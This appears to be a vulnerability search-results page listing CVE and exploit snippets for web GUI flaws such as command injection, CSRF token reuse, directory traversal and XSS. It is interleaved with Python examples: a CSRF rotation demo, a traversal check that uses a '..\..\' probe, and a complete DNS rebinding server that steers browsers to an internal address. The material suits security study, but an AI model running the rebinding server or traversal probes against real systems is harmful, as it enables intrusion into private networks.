330 matches found
Input validation
LPAR2RRD in 3.5 and earlier allows remote attackers to execute arbitrary commands due to insufficient input sanitization of the web GUI parameters...
CVE-2014-4981
CVE-2014-4981 affects LPAR2RRD 3.5 and earlier, where insufficient input sanitization of web GUI parameters allows remote attackers to execute arbitrary commands. The underlying issue is missing input validation that enables arbitrary command injection on the LPAR2RRD ser...
CVE-2019-3864
A vulnerability was discovered in all quay-2 versions before quay-3.0.0, in the Quay web GUI where POST requests include a specific parameter which is used as a CSRF token. The token is not refreshed for every request or when a user logged out and in again. An attacker could use a leaked token to...
Cross-site request forgery (CSRF)
A vulnerability was discovered in all quay-2 versions before quay-3.0.0, in the Quay web GUI where POST requests include a specific parameter which is used as a CSRF token. The token is not refreshed for every request or when a user logged out and in again. An attacker could use a leaked token to...
CVE-2019-3864
CVE-2019-3864 affects all quay-2 versions prior to quay-3.0.0, where the Quay web GUI uses a CSRF token embedded in a POST parameter that is not refreshed per request or on logout, enabling an attacker with a leaked token to access a user’s account. Affected product: Red Hat Quay (Quay web applic...
CVE-2019-3864
A vulnerability was discovered in the Quay web GUI where POST requests include a specific parameter which is used as a CSRF token. The token is not refreshed for every request or when a user logged out and in again. An attacker could use a leaked token to gain access to the system using the user'...
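The token-lifecycle flaw described in the Quay entries above (a CSRF token that survives logout and re-login), shown as an added Python example that is not Quay's own code. The class and function names, the user "alice" and the replay scenario are constructed for the illustration; the weak store reproduces the described behaviour of one never-rotated token per user, the hardened store binds the token to a single login.

```python
import hmac
import secrets


class RotatingTokenStore:
    """Server-side sessions whose CSRF token is bound to one login.

    login() mints a fresh session id and a fresh token; logout() discards
    both, so a token that leaked during an earlier session is useless later.
    """

    def __init__(self):
        self._sessions = {}  # session id -> {"user": ..., "csrf": ...}

    def login(self, user):
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
        return sid

    def logout(self, sid):
        self._sessions.pop(sid, None)

    def csrf_token(self, sid):
        return self._sessions[sid]["csrf"]

    def accept_post(self, sid, submitted):
        """Accept a state-changing POST only if the token matches this session."""
        sess = self._sessions.get(sid)
        if sess is None or submitted is None:
            return False
        # Constant-time comparison so the check does not leak token bytes.
        return hmac.compare_digest(sess["csrf"], submitted)


class StaticTokenStore(RotatingTokenStore):
    """The weak pattern, reconstructed for illustration (assumption, not Quay
    code): one token per user that is never rotated, so a captured token keeps
    authorizing POSTs across logout and re-login."""

    def __init__(self):
        super().__init__()
        self._per_user = {}

    def login(self, user):
        sid = secrets.token_urlsafe(32)
        token = self._per_user.setdefault(user, secrets.token_urlsafe(32))
        self._sessions[sid] = {"user": user, "csrf": token}
        return sid


def leaked_token_replay(store_cls):
    """Scenario: victim logs in, the token leaks, victim logs out and back in,
    and a forged request arrives on the new session carrying the old token
    (the browser supplies the new session cookie automatically).
    Returns True if the replayed token is accepted."""
    store = store_cls()
    sid1 = store.login("alice")
    leaked = store.csrf_token(sid1)
    store.logout(sid1)
    sid2 = store.login("alice")
    return store.accept_post(sid2, leaked)


if __name__ == "__main__":
    print("static token replay accepted:", leaked_token_replay(StaticTokenStore))
    print("rotating token replay accepted:", leaked_token_replay(RotatingTokenStore))
```

Rotating per login is the minimum that defeats the replay the advisory describes; rotating per request (the other gap it names) is stricter still but complicates multi-tab use, so many frameworks settle for per-session tokens plus invalidation on logout.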
Remote code execution
/var/WEB-GUI/cgi-bin/telnet.cgi on FiberHome HG2201T 1.00.M5007JS201804 devices allows pre-authentication remote code execution...
DNS Rebinding Tool - DNS Rebind Tool With Custom Scripts
Inspired by @tavisio This project is meant to be an all-in-one toolkit to test further DNS rebinding attacks and my take on understanding this kind of attack. It consists of a web server and pseudo DNS server that only responds to A queries. The root index of the web server allows to configure...
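The "pseudo DNS server that only responds to A queries" is the core of a rebinding setup, so here is an added Python example of one, written for this page and not taken from the tool above. It parses a raw DNS query, answers A lookups for one name with the attacker's address first and the internal target afterwards (TTL 0 so the browser re-resolves), and refuses everything else. The name rebind.example.test, the addresses 203.0.113.10 and 192.168.1.1, and the helper names are assumptions chosen for the illustration.

```python
import socket
import struct

# Constructed addresses for the illustration (assumptions, not from the tool):
# the attacker's public web server and the internal target the victim browser
# should be tricked into reaching once the name "rebinds".
ATTACKER_IP = "203.0.113.10"
TARGET_IP = "192.168.1.1"
REBIND_NAME = "rebind.example.test"


def parse_question(packet):
    """Parse the first question of a DNS query.
    Returns (txid, qname, qtype, raw question section)."""
    txid, qdcount = struct.unpack("!H", packet[:2])[0], struct.unpack("!H", packet[4:6])[0]
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    pos, labels = 12, []
    while True:
        length = packet[pos]
        pos += 1
        if length == 0:
            break
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    qtype = struct.unpack("!H", packet[pos:pos + 2])[0]
    pos += 4  # skip qtype and qclass
    return txid, ".".join(labels), qtype, packet[12:pos]


def build_a_response(txid, question, ip, ttl=0):
    """Minimal response with one A record. ttl=0 is the point of the attack:
    the client must re-resolve on its next connection and see the new address."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR, RD, RA, NOERROR
    # Name pointer to offset 12 (the question name), type A, class IN, ttl, rdlength.
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + question + answer


class RebindResolver:
    """Answer A queries for REBIND_NAME: the attacker IP for the first
    `flips_after` lookups, the target IP afterwards. Any other name or
    record type is REFUSED with an empty answer section."""

    def __init__(self, first_ip=ATTACKER_IP, then_ip=TARGET_IP, flips_after=1):
        self.first_ip, self.then_ip, self.flips_after = first_ip, then_ip, flips_after
        self.seen = {}

    def handle(self, packet):
        txid, qname, qtype, question = parse_question(packet)
        if qtype != 1 or qname.lower() != REBIND_NAME:
            return struct.pack("!HHHHHH", txid, 0x8185, 1, 0, 0, 0) + question  # RCODE 5
        count = self.seen.get(qname, 0)
        self.seen[qname] = count + 1
        ip = self.first_ip if count < self.flips_after else self.then_ip
        return build_a_response(txid, question, ip, ttl=0)


def build_query(name, txid=0x1234, qtype=1):
    """Constructed client query, so the resolver can be exercised offline."""
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", qtype, 1)


def answered_ip(response):
    """Address carried by a response from build_a_response."""
    return socket.inet_ntoa(response[-4:])


def answered_ttl(response):
    """TTL carried by a response from build_a_response."""
    return struct.unpack("!I", response[-10:-6])[0]


def serve(bind=("0.0.0.0", 5353)):
    """Run the responder on UDP; a real deployment points the NS of the
    rebinding domain at this host."""
    resolver = RebindResolver()
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(bind)
    while True:
        data, addr = sock.recvfrom(512)
        sock.sendto(resolver.handle(data), addr)


if __name__ == "__main__":
    serve()
```

A TTL of 0 is not honoured everywhere: browsers pin resolved addresses for a while and some resolvers clamp low TTLs upward, which is why the flip here is driven by a lookup counter rather than by the TTL alone, and why real tooling also lets you tune when the switch happens.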
Security Bulletin: Vulnerability in system log on IBM MQ Appliance WebGUI (CVE-2017-1591)
Summary A potential cross-site scripting vulnerability exists in the IBM MQ Appliance system log. IBM has addressed the applicable CVE. Vulnerability Details CVEID: CVE-2017-1591 DESCRIPTION: IBM WebSphere DataPower Appliances 7.0.0 through 7.6 and IBM MQ Appliances are vulnerable to cross-site...
Directory traversal
A Directory Traversal issue was discovered in the Web GUI in Titan FTP Server 2019 Build 3505. When an authenticated user attempts to preview an uploaded file through PreviewHandler.ashx by using a ..\..\ technique, arbitrary files can be loaded in the server response outside the root directory...
CVE-2019-10009
A Directory Traversal issue was discovered in the Web GUI in Titan FTP Server 2019 Build 3505. When an authenticated user attempts to preview an uploaded file through PreviewHandler.ashx by using a ..\..\ technique, arbitrary files can be loaded in the server response outside the root directory...
CVE-2019-10009
The CVE-2019-10009 entry relates to Titan FTP Server 2019 Build 3505, where an authenticated user could exploit a Directory Traversal via PreviewHandler.ashx using a ../../.. path to load arbitrary files outside the web root. Exploit details are corroborated by multiple sources, and mitigation is...
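The Titan FTP entries above describe a preview handler on Windows that can be walked out of its root with backslash traversal. As an added Python example (not Titan's code; the handler's real logic is not on this page), here is the kind of check that such a sequence defeats beside a hardened resolution that canonicalizes with the host's path rules and then verifies containment. It goes slightly beyond the entry by handling both Windows and POSIX separators. The web root paths, file names and function names are constructed for the illustration.

```python
import ntpath
import posixpath


def _pathmod(windows):
    # ntpath/posixpath implement their OS's rules regardless of the host,
    # so both variants can be exercised on one machine.
    return ntpath if windows else posixpath


def naive_preview_path(root, name, windows=True):
    """Vulnerable pattern: strip forward-slash traversal only, then join.
    A ..\\..\\ sequence survives untouched and escapes root on Windows."""
    p = _pathmod(windows)
    cleaned = name.replace("../", "")
    return p.normpath(p.join(root, cleaned))


def safe_preview_path(root, name, windows=True):
    """Hardened resolution: reject absolute or drive-qualified input, normalize
    the joined path with the serving OS's rules (this folds both separators and
    resolves '..'), and require the result to stay inside root.
    Returns the canonical path, or None if the request would escape."""
    p = _pathmod(windows)
    if p.isabs(name) or p.splitdrive(name)[0]:
        return None
    root_n = p.normcase(p.normpath(root))
    candidate = p.normcase(p.normpath(p.join(root, name)))
    if candidate == root_n or candidate.startswith(root_n + p.sep):
        return candidate
    return None


def escapes_root(root, name, windows=True):
    """True when the hardened check refuses the request."""
    return safe_preview_path(root, name, windows) is None


if __name__ == "__main__":
    # Constructed web root for the demonstration.
    root = r"C:\inetpub\TitanFTP\uploads"
    probe = r"..\..\..\Windows\win.ini"
    print("naive resolves to:", naive_preview_path(root, probe))
    print("hardened resolves to:", safe_preview_path(root, probe))
```

This check is lexical: it stops ..\..\ and ../ escapes but not a symlink or NTFS junction placed inside the upload root, so on a live server resolve the candidate with os.path.realpath before the containment test and run the check on the OS that actually serves the files, since normcase and separator handling differ between platforms.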
Command injection
A Command Injection vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to execute arbitrary commands...
NetNumber Titan ENUM/DNS/NP 7.9.1 Bypass / Traversal
Exploit Title: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass Google Dork: N/A Date: 4/29/2019 Exploit Author: MobileNetworkSecurity Vendor Homepage: https://www.netnumber.com/products/data Software Link: N/A Version: Titan Master 7.9.1 Tested on: Linux CVE : N/A Type: WEBAPP...
NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal Authorization Bypass
NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal Authorization Bypass Exploit Title: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass Google Dork: N/A Date: 4/29/2019 Exploit Author: MobileNetworkSecurity Vendor Homepage: https://www.netnumber.com/products/data Software Link: N...
NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass Vulnerabilities
Exploit for the Linux platform in the web applications category Exploit Title: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass Exploit Author: MobileNetworkSecurity Vendor Homepage: https://www.netnumber.com/products/data Software Link: N/A Version: Titan Master 7.9.1 Tested on: Linux...
NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass
Exploit Title: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass Google Dork: N/A Date: 4/29/2019 Exploit Author: MobileNetworkSecurity Vendor Homepage: https://www.netnumber.com/products/data Software Link: N/A Version: Titan Master 7.9.1 Tested on: Linux CVE : N/A Type: WEBAPP...